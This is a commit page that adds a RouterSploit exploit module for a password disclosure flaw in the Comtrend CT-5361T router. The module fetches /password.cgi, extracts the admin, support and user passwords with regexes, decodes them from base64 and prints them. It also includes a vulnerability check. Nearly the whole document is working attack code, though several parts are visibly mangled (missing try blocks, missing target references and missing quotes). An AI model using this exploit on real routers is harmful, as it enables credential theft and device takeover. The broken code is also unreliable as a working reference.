Commit 4fc0d9b2 by Marcin Bury

Merge pull request #3 from HassenPy/master

Comtrend CT 5361T Password Disclosure vulnerability
parents ed9dae75 235446ad
from base64 import b64decode
import requests
import re
from routersploit import *
class Exploit(exploits.Exploit):
Exploit implementation for Comtrend CT-5361T Password Disclosure vulnerability.
If the target is vulnerable it allows to read credentials for admin, support and user."
__info__ = {
'name': 'Comtrend CT 5361T Password Disclosure Vulnerability',
'description': 'WiFi router Comtrend CT 5361T suffers from a Password Disclosure Vulnerability',
'author': 'TUNISIAN CYBER', # routersploit module,
'references': [
'targets': [
'Comtrend CT 5361T (more likely CT 536X)\n' +
'Software Version: A111-312SSG-T02_R01\n' +
'Wireless Driver Version:'
target = exploits.Option('', 'Target address e.g.') # target address
port = exploits.Option(80, 'Target port') # default port
def run(self):
url = sanitize_url("{}:{}/password.cgi".format(, self.port))
print_status("Requesting for {}".format(url))
r = requests.get(url)
res = r.text
except (requests.exceptions.MissingSchema, requests.exceptions.InvalidSchema):
print_error("Invalid URL format: %s" % url)
except requests.exceptions.ConnectionError:
print_error("Connection error: %s" % url)
creds = []
admin = re.findall("pwdAdmin = '(.+?)'", res)
if len(admin):
creds.append(('Admin', b64decode(admin[0])))
support = re.findall("pwdSupport = '(.+?)'", res)
if len(support):
creds.append(('Support', b64decode(support[0])))
user = re.findall("pwdUser = '(.+?)'", res)
if len(user):
creds.append(('User', b64decode(user[0])))
if len(creds):
print_success("Credentials found!")
headers = ("Login", "Password")
print_table(headers, *creds)
print("NOTE: Admin is commonly implemented as root")
print_error("Credentials could not be found")
def check(self):
url = sanitize_url("{}:{}/password.cgi".format(, self.port))
r = requests.get(url)
res = r.text
return None # could not be verified
if any(map(lambda x: x in res, ["pwdSupport", "pwdUser", "pwdAdmin"])):
return True # target vulnerable
return False # target not vulnerable
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